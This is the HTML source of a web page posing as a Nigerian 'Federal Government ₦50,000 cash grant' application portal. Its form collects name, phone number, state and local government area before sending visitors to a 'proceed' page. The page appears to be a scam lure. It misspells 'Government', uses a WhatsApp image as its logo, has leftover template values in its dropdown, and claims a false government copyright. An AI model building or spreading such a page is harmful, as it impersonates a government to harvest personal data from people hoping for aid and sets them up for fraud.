<!DOCTYPE html><html lang="en-US"><head>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="styles.css">
    <script src="js/jquery.min.js"></script>
    <script src="js/bootstrap.min.js"></script>
    
    <meta property="og:title" content="FG CASH GRANT FORM">
    <meta property="og:description" content="Apply for FG cash grant - Fill out the application form below">
    <meta property="og:image" itemprop="image" content="BATCH B.png">
    <meta property="og:type" content="website">
    <meta property="fb:app_id" content="966242223397117">
    <title>FEDERAL GEVERNMENT ₦50,000 CASH GRANT </title>
    <style>
        /* Reset some default styles */
        body, h1, h2, h3, p, ul, li {
            margin: 0;
            padding: 0;
        }

        /* Apply a background color and font to the body */
        body {
            background-color: #f0f0f0;
            font-family: impact, sans-serif;
        }

        /* Style the header */
        .header {
            text-align: center;
            background-color: green;
            color: #d6d9d8;
            padding: 20px;
        }

        /* Style the logo */
        .logo {
            max-width: 100%;
        }

        /* Style the main content */
        .content {
            background-color: #d6d9d8;
            padding: 20px;
            border: 2px solid green;
            border-radius: 5px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
        }

        /* Style the form */
        form {
            max-width: 400px;
            margin: 0 auto;
        }

        /* Style the form input fields */
        input[type="text"],
        select {
            width: 90%;
            padding: 20px;
            margin-bottom: 20px;
            border: 2px solid green;
            border-radius: 10px;
        }

        /* Style the submit button */
        .button {
            background-color: green;
            color: #d6d9d8;
            border: none;
            padding: 15px 30px;
            border-radius: 10px;
            cursor: pointer;
        }

       
        .footer {
            background-color: green;
            color: #d6d9d8;
            text-align: center;
            padding: 15px 0;
        }
    </style>
</head>
<body>
    <div class="header">
        <h1>FEDERAL GOVERNMENT ₦50,000 CASH GRANT FORM PORTAL</h1><br>
        <img src="images/WhatsApp%20Image%202024-06-16%20at%2012.53.53%20PM.jpeg" alt="logo" class="logo" height="450px" style="border-style: solid;border-radius: 10px;border-width: 5px;">
    </div>
    <div class="content">
        <center><p>FILL THE FORM BELOW AND PROCEED:</p></center><br>
        <form action="proceed.html" method="post">
           <center> <select style="width: auto;">
                <option value="" disabled="" selected="">Select Title</option>
                <option value="Software Developer">Mr</option>
                <option value="Marketing Specialist">Miss</option>
                <option value="Graphic Designer">Mrs</option>
                
            </select></center>
            <input type="text" name="full_name" placeholder="ENTER YOUR FULL-NAME:">
            <input type="text" name="phone" placeholder="PHONE NUMBER:">
            <input type="text" name="address" placeholder="STATE:">
            <input type="text" name="lga" placeholder="L.G.A:">

            <br>
            <center><a href="proceed.html"><button type="button" class="button">PROCEED</button></a></center>
        </form>
      
    </div>
    <div class="footer">
        © Federal Government Portal. All rights reserved.©
        
    </div>


<center><script type="text/javascript" src="js/online_i.js"></script><script type="text/javascript">sc_online_i(1690172,"ffffff","ffffff");</script><br><noscript><a href="https://www.supercounters.com/">free online counter</a></noscript>
</center>
<!-- END: Powered by Supercounters.com -->


</body><!-- BEGIN: Powered by Supercounters.com --></html>